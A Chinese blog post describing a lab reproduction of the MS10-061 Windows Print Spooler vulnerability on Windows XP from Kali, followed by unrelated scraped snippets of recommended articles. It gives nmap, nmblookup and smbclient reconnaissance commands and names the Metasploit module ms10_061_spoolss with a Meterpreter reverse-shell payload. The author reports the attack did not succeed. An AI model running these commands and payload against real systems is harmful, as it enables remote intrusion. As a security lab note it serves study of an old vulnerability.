讲在前面

此漏洞中文称为：打印后台程序服务模拟漏洞。目前所有的研究文章总结的漏洞成因为：Windows打印后台程序没有充分的限制访问该服务的问题，攻击者可以对其发起恶意请求间接的在Windows系统目录（%SystemRoot%\System32）中创建文件。该漏洞首次被发现并被利用于著名的Stuxnet蠕虫（俗称“震网”）

实验环境

WinXP
Kali

实验步骤

一、开启WinXP上打印机共享服务

打开控制面板，找到“打印机和传真”，双击打开后，右键选择“添加打印机”。如下地方的配置请注意

二、kali攻击

1、nmap扫描靶机是否正常开启NetBios和RPC服务

nmap -sS -sU -O -p137-139,445, 192.168.1.122

2、查看netbios名称

nmblookup -A 192.168.1.122

3、查看共享SMB共享资源

smbclient -L \\NetBIOS工作站名字 -I 靶机IP -N或者在主机上执行net share命令

设置参数并攻击

exploit/windows/smb/ms10_061_spoolssPayload:windows/meterpreter/reverse_tcp

总结：

笔者这里并未验证成功，并且在win7上也未能利用成功该漏洞，按照微软官方预警，是影响XP\2003\2008\win7的

影响范围

目前未看到有国内研究员的详细研究文章，此处贴出本文借鉴的实验文章

ms10-061复现

CVE-2010-2729(MS10-061)相关推荐

看雪论坛『Android安全』版优秀和精华帖分类索引
逆向技术基础 < 对某APK的一次分析 > JayL的这篇分析中介绍的工具对初学者依然值得参考. < android一个crackme分析和破解 > zhaokang的Crac ...
『Android安全』版优秀和精华帖分类索引
逆向技术基础 < 对某APK的一次分析 > JayL的这篇分析中介绍的工具对初学者依然值得参考. < android一个crackme分析和破解 > zhaokang的Crac ...
Android安全』版优秀和精华帖分类索引
http://www.kanxue.com/bbs/showthread.php?t=179524&viewgoodnees=1&prefixid= 逆向技术基础 <对某APK的 ...
永恒之蓝MS17-010
永恒之蓝MS17-010 实验概述 Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了"明星".在过去的五 ...
看个AV也中招之cve-2010-2553漏洞分析
试想:某一天,你的基友给你了一个视频文件,号称是陈老师拍的苍老师的老师题材的最新电影.avi,你满心欢喜,在确定文件格式确实为avi格式后,愉快的脱下裤子准备欣赏,打开后却发现什么也没有,而随后你的基 ...
Android 安全学习
转载地址:http://bbs.pediy.com/showthread.php?t=179524&viewgoodnees=1&prefixid= 逆向技术基础 < 对某APK ...
如何找到相似Graph？DeepMind提出超越GNN的图匹配网络
选自arxiv 作者:Yujia Li.Chenjie Gu.Thomas Dullien等机器之心编译参与:李诗萌.路雪近日,DeepMind 和谷歌联合进行了一项研究,该研究提出了一种执行相 ...
基于bootstrap实现的在线商城前端整站源码，页面齐全
大家好,今天给大家介绍一款,基于bootstrap实现的在线商城前端整站源码,功能很齐全(图1).送给大家哦,获取方式在本文末尾. 图1 商品列表页(图2) 图2 商品详情页(图3) 图3 分类导航菜 ...
【转】2010全球最值得模仿的230个网站
从全球千万计的网站中选出最具创意的230家网站进行介绍,其奇思妙想,令人叹为观止,开阔眼界,给人以启示,使人产生联想的火花.当然其中一些竞争已经比较惨烈,比如groupon模式,大家务必擦亮眼睛辨别, ...
CVE PoC的精选列表（三）
CVE-2017-0146 Microsoft Windows Vista SP2中的SMBv1服务器:Windows Server 2008 SP2和R2 SP1; Windows 7 SP1:Wi ...

CVE-2010-2729(MS10-061)